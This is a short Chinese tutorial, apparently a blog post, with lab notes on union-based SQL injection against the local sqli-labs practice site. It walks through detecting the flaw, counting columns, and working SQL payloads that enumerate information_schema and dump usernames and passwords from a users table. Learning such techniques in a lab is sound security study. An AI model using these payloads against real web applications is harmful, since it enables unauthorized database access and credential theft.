1、判断有无注入点
使用and 1=1 测试
随便输入内容不报错:没有注入点
随意输入内容报错了:有注入点
2、猜解列名
order by 1/2/3/4...出现报错的前一个就是列名的数量
3、报错,判断回显点 union
?id = 1 union select 1,2,3...
上一步确定了字段数量,因为union的特性前后查询的列的数量要一致。
4、信息收集
5、使用对应的sql注入
获取密码使用数据库库名:security
在information_schema库中查找
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'
group_concat去重分组函数
查看security库中的表
查询表中的字段
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
查询账号密码
union select 1,(select group_concat(username,0x3a,password)from users),3
或者union select 1, group_concat(username,0x3a,password),3 from users
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!